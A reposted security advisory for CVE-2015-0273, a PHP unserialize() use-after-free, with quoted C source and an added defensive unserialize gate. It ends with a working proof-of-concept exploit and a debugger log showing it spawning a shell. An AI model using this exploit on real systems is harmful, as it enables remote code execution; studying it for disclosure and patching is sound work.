
[CVE-2015-0273] Use-After-Free vulnerability (with POC)

2015-03-02 11:05


A use-after-free vulnerability was discovered in unserialize() in the __wakeup() magic method of the DateTime/DateTimeZone objects. It can be abused to leak arbitrary memory blocks and to execute arbitrary code remotely.

Affected versions

PHP 5.6 < 5.6.6

PHP 5.5 < 5.5.22

PHP 5.4 < 5.4.38

PHP 5.3 <= 5.3.29

Credit

This vulnerability was discovered by Taoguang Chen.

Description

/* ext/date/php_date.c: the DateTime __wakeup() path. The hash values come
 * straight from the serialized payload and are converted in place. */
static int php_date_initialize_from_hash(php_date_obj **dateobj, HashTable *myht)
{
    zval             *z_date;
    zval             *z_timezone;
    zval             *z_timezone_type;
    zval              tmp_obj;
    timelib_tzinfo   *tzi;
    php_timezone_obj *tzobj;
    z_date = zend_hash_str_find(myht, "date", sizeof("data")-1);
    if (z_date) {
        convert_to_string(z_date);
        z_timezone_type = zend_hash_str_find(myht, "timezone_type", sizeof("timezone_type")-1);
        if (z_timezone_type) {
            convert_to_long(z_timezone_type);
            z_timezone = zend_hash_str_find(myht, "timezone", sizeof("timezone")-1);
            if (z_timezone) {
                convert_to_string(z_timezone);
...
/* ext/date/php_date.c: the DateTimeZone __wakeup() path (PHP 5.x API). */
static int php_date_timezone_initialize_from_hash(zval **return_value, php_timezone_obj **tzobj, HashTable *myht TSRMLS_DC)
{
    zval            **z_timezone = NULL;
    zval            **z_timezone_type = NULL;
    if (zend_hash_find(myht, "timezone_type", 14, (void**) &z_timezone_type) == SUCCESS) {
        if (zend_hash_find(myht, "timezone", 9, (void**) &z_timezone) == SUCCESS) {
            /* no type check: if timezone_type was serialized as an array,
             * this conversion destroys that array and everything it holds */
            convert_to_long(*z_timezone_type);
            if (SUCCESS == timezone_initialize(*tzobj, Z_STRVAL_PP(z_timezone) TSRMLS_CC)) {
                return SUCCESS;
            }
        }
    }
    return FAILURE;
}


convert_to_long() causes the ZVAL and all of its children to be freed from memory. However, the unserialize() code still allows R: or r: references to point at that already freed memory. This is a use-after-free, which leads to arbitrary code execution.
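As an added example from the defender's side (not part of the advisory or its PoC), the following PHP gate is for code that must call unserialize() on data it does not fully trust on builds in the affected ranges above: it checks the running version against those ranges and refuses payloads that declare objects or back-references, since the trigger needs a DateTimeZone object plus an R: reference into the array that convert_to_long() frees. The function names are my own.

```php
<?php
// Added example, not part of the advisory: a defensive gate around
// unserialize() for builds that may lack the CVE-2015-0273 fix.
// The function names are assumptions chosen for illustration.

// Affected ranges exactly as listed in the advisory above.
function php_affected_by_cve_2015_0273($version = PHP_VERSION)
{
    if (version_compare($version, '5.6.0', '>=')) {
        return version_compare($version, '5.6.6', '<');
    }
    if (version_compare($version, '5.5.0', '>=')) {
        return version_compare($version, '5.5.22', '<');
    }
    if (version_compare($version, '5.4.0', '>=')) {
        return version_compare($version, '5.4.38', '<');
    }
    return true; // 5.3.x and older never received a fix
}

// True if the payload declares an object (O:/C:) or a back-reference (R:/r:)
// at a token boundary. The trigger needs both: a DateTimeZone object and an
// R: pointing into the array that convert_to_long() frees. A string value can
// contain the same characters, so this prefers false positives over misses.
function serialized_declares_objects_or_refs($data)
{
    return preg_match('/(?:^|[;{])(?:[OC]:\d+:"|[Rr]:\d+;)/', $data) === 1;
}

// Unserialize only plain arrays and scalars; refuse anything else up front.
function unserialize_scalars_only($data)
{
    if (!is_string($data) || serialized_declares_objects_or_refs($data)) {
        return false;
    }
    if (PHP_VERSION_ID >= 70000) {
        // PHP 7+ can additionally enforce this inside the engine.
        return unserialize($data, array('allowed_classes' => false));
    }
    return unserialize($data);
}

// Constructed sample inputs: the object/reference shape used by the PoC
// (without its fake zval bytes) next to an ordinary session-style array.
$object_payload = 'a:2:{i:0;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;i:1;}s:8:"timezone";s:3:"UTC";}i:1;a:1:{i:0;R:4;}}';
$plain_payload  = 'a:2:{s:4:"user";s:5:"alice";s:4:"role";s:6:"viewer";}';

var_dump(php_affected_by_cve_2015_0273('5.5.14'));
var_dump(unserialize_scalars_only($object_payload));
$plain = unserialize_scalars_only($plain_payload);
var_dump($plain['role']);
```

On the PoC's own test build (5.5.14) the first call reports the build as affected, the object payload is refused before unserialize() ever sees it, and the plain array is decoded normally.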

POC

This POC was tested on Mac OS X 10.10.2 with PHP 5.5.14.

<?php
$f = $argv[1];
$c = $argv[2];
$fakezval1 = ptr2str(0x100b83008);
$fakezval1 .= ptr2str(0x8);
$fakezval1 .= "\x00\x00\x00\x00";
$fakezval1 .= "\x06";
$fakezval1 .= "\x00";
$fakezval1 .= "\x00\x00";
$data1 = 'a:3:{i:0;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;i:1;}s:8:"timezone";s:3:"UTC";}i:1;s:'.strlen($fakezval1).':"'.$fakezval1.'";i:2;a:1:{i:0;R:4;}}';
$x = unserialize($data1);
$y = $x[2];
// zend_eval_string()'s address
$y[0][0] = "\x6d";
$y[0][1] = "\x1e";
$y[0][2] = "\x35";
$y[0][3] = "\x00";
$y[0][4] = "\x01";
$y[0][5] = "\x00";
$y[0][6] = "\x00";
$y[0][7] = "\x00";
$fakezval2 = ptr2str(0x3b296324286624); // $f($c);
$fakezval2 .= ptr2str(0x100b83000);
$fakezval2 .= "\x00\x00\x00\x00";
$fakezval2 .= "\x05";
$fakezval2 .= "\x00";
$fakezval2 .= "\x00\x00";
$data2 = 'a:3:{i:0;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;i:1;}s:8:"timezone";s:3:"UTC";}i:1;s:'.strlen($fakezval2).':"'.$fakezval2.'";i:2;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;R:4;}s:8:"timezone";s:3:"UTC";}}';
$z = unserialize($data2);
function ptr2str($ptr)
{
    $out = "";
    for ($i=0; $i<8; $i++) {
        $out .= chr($ptr & 0xff);
        $ptr >>= 8;
    }
    return $out;
}
?>

Run from the command line, it executes arbitrary PHP code.

$ lldb php
(lldb) target create "php"
Current executable set to 'php' (x86_64).
(lldb) run uafpoc.php assert "system\('sh'\)==exit\(\)"
Process 13472 launched: '/usr/bin/php' (x86_64)
sh: no job control in this shell
sh-3.2$ php -v
PHP 5.5.14 (cli) (built: Sep  9 2014 19:09:25) 
Copyright (c) 1997-2014 The PHP Group
Zend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies
sh-3.2$ exit
exit
Process 13472 exited with status = 0 (0x00000000) 
(lldb)

Taoguang Chen <@chtg> - Write Date: 2015.1.29 - Release Date: 2015.2.20

Source: www.cnxhacker.com/2015/02/28/7487.html
